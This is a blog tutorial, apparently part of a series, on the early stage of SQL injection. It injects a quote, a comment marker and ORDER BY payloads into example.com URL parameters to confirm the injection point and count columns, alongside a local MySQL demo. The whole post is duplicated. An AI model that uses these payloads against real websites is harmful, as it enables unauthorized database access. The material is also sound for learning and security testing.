I have already Discussed how to find the vulnerable parameter for injecting SQL Query.
Note: If some query has worked for fuzzing one website, this doesnt means the same would work for the others.
It all depends on how the filtration process is done.
So this is our next Step towards SQL Injection.
Lets say we have an URL
http://www.example.com/index.php?id=1
And lets assume that appending a single quote broke the normal workflow and gave an Error.
http://www.example.com/index.php?id=1'
And keeping the single quote, when we appended a comment symbol, (--+) it bring back the normal page.
Thus we now have identified the place where we will inject our SQL Queries.
http://www.example.com/index.php?id= 1' --+
Now the next step after finding the SQL Injection field, we have to get the columns count, i.e the number of columns used.
If we write the query in SQL terms, its:
SELECT * FROM table
WHERE id = ' 1 ' ;
After, injecting
SELECT * FROM table
WHERE id = ' 1' --+ ' ;
Lets show here a quick SQL Table and the queries
mysql> use ckorner ;
Database changed
mysql> select database() ;
+------------+
| database() |
+------------+
| ckorner |
+------------+
1 row in set (0.00 sec)
mysql> show tables ;
+-------------------+
| Tables_in_ckorner |
+-------------------+
| admin |
| products |
| users |
+-------------------+
3 rows in set (0.00 sec)
mysql> select * from products;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 2 | Laptop | 15000 |
| 3 | iPhone | 13000 |
| 1 | Printer | 4500 |
+------+---------+-------+
3 rows in set (0.00 sec)
mysql> select * from products order by id ;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
| 2 | Laptop | 15000 |
| 3 | iPhone | 13000 |
+------+---------+-------+
3 rows in set (0.00 sec)
mysql> select * from products where id=1 ;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
+------+---------+-------+
1 row in set (0.00 sec)
mysql> select * from products where id=1 order by 1 ;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
+------+---------+-------+
1 row in set (0.00 sec)
mysql> select * from products where id=1 order by 2;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
+------+---------+-------+
1 row in set (0.00 sec)
mysql> select * from products where id=1 order by 3;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
+------+---------+-------+
1 row in set (0.00 sec)
mysql> select * from products where id=1 order by 4;
ERROR 1054 (42S22): Unknown column '4' in 'order clause'
mysql>
So what do we see here, we have a Table named "Products" and in this table we have 3 rows(records) and 3 columns.
Suppose I dint know how many columns I had, and lets say I forgot how to check the columns, I will use the "order by" query to bruteforce and find the columns count. as you see "order by 4" gave an error stating that unknown column.
In the same way we will use this process to find out the columns count by injecting "ORDER BY" Query.
So in our URL:
http://www.example.com/index.php?id= 1' ORDER BY 1 --+ >> No Error or Blank Page
http://www.example.com/index.php?id= 1' ORDER BY 2 --+ >> No Error or Blank Page
http://www.example.com/index.php?id= 1' ORDER BY 3 --+ >> No Error or Blank Page
http://www.example.com/index.php?id= 1' ORDER BY 4 --+ >> Error
So we found that the number of columns count is 3. Why we need to find it out, thats a secret to be revealed in the later posts.
Note: Finding the columns is not click and go task, because in a given website we have no idea, how many columns might be there.
So a quick tip:
http://www.example.com/index.php?id= 1' ORDER BY 50 --+ >> Error
http://www.example.com/index.php?id= 1' ORDER BY 25 --+ >> Error
http://www.example.com/index.php?id= 1' ORDER BY 15 --+ >> Error
http://www.example.com/index.php?id= 1' ORDER BY 10 --+ >> No Error
Means the count is somewhere between 10 and 15
http://www.example.com/index.php?id= 1' ORDER BY 13 --+ >> Error
http://www.example.com/index.php?id= 1' ORDER BY 12 --+ >> Error
http://www.example.com/index.php?id= 1' ORDER BY 11 --+ >> No Error
So I hope you enjoyed it.
Thank You!
Note: If some query has worked for fuzzing one website, this doesnt means the same would work for the others.
It all depends on how the filtration process is done.
So this is our next Step towards SQL Injection.
Lets say we have an URL
http://www.example.com/index.php?id=1
And lets assume that appending a single quote broke the normal workflow and gave an Error.
http://www.example.com/index.php?id=1'
And keeping the single quote, when we appended a comment symbol, (--+) it bring back the normal page.
Thus we now have identified the place where we will inject our SQL Queries.
http://www.example.com/index.php?id= 1' --+
Now the next step after finding the SQL Injection field, we have to get the columns count, i.e the number of columns used.
If we write the query in SQL terms, its:
SELECT * FROM table
WHERE id = ' 1 ' ;
After, injecting
SELECT * FROM table
WHERE id = ' 1' --+ ' ;
Lets show here a quick SQL Table and the queries
mysql> use ckorner ;
Database changed
mysql> select database() ;
+------------+
| database() |
+------------+
| ckorner |
+------------+
1 row in set (0.00 sec)
mysql> show tables ;
+-------------------+
| Tables_in_ckorner |
+-------------------+
| admin |
| products |
| users |
+-------------------+
3 rows in set (0.00 sec)
mysql> select * from products;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 2 | Laptop | 15000 |
| 3 | iPhone | 13000 |
| 1 | Printer | 4500 |
+------+---------+-------+
3 rows in set (0.00 sec)
mysql> select * from products order by id ;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
| 2 | Laptop | 15000 |
| 3 | iPhone | 13000 |
+------+---------+-------+
3 rows in set (0.00 sec)
mysql> select * from products where id=1 ;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
+------+---------+-------+
1 row in set (0.00 sec)
mysql> select * from products where id=1 order by 1 ;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
+------+---------+-------+
1 row in set (0.00 sec)
mysql> select * from products where id=1 order by 2;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
+------+---------+-------+
1 row in set (0.00 sec)
mysql> select * from products where id=1 order by 3;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
+------+---------+-------+
1 row in set (0.00 sec)
mysql> select * from products where id=1 order by 4;
ERROR 1054 (42S22): Unknown column '4' in 'order clause'
mysql>
So what do we see here, we have a Table named "Products" and in this table we have 3 rows(records) and 3 columns.
Suppose I dint know how many columns I had, and lets say I forgot how to check the columns, I will use the "order by" query to bruteforce and find the columns count. as you see "order by 4" gave an error stating that unknown column.
In the same way we will use this process to find out the columns count by injecting "ORDER BY" Query.
So in our URL:
http://www.example.com/index.php?id= 1' ORDER BY 1 --+ >> No Error or Blank Page
http://www.example.com/index.php?id= 1' ORDER BY 2 --+ >> No Error or Blank Page
http://www.example.com/index.php?id= 1' ORDER BY 3 --+ >> No Error or Blank Page
http://www.example.com/index.php?id= 1' ORDER BY 4 --+ >> Error
So we found that the number of columns count is 3. Why we need to find it out, thats a secret to be revealed in the later posts.
Note: Finding the columns is not click and go task, because in a given website we have no idea, how many columns might be there.
So a quick tip:
http://www.example.com/index.php?id= 1' ORDER BY 50 --+ >> Error
http://www.example.com/index.php?id= 1' ORDER BY 25 --+ >> Error
http://www.example.com/index.php?id= 1' ORDER BY 15 --+ >> Error
http://www.example.com/index.php?id= 1' ORDER BY 10 --+ >> No Error
Means the count is somewhere between 10 and 15
http://www.example.com/index.php?id= 1' ORDER BY 13 --+ >> Error
http://www.example.com/index.php?id= 1' ORDER BY 12 --+ >> Error
http://www.example.com/index.php?id= 1' ORDER BY 11 --+ >> No Error
So I hope you enjoyed it.
Thank You!
0 comments:
Post a Comment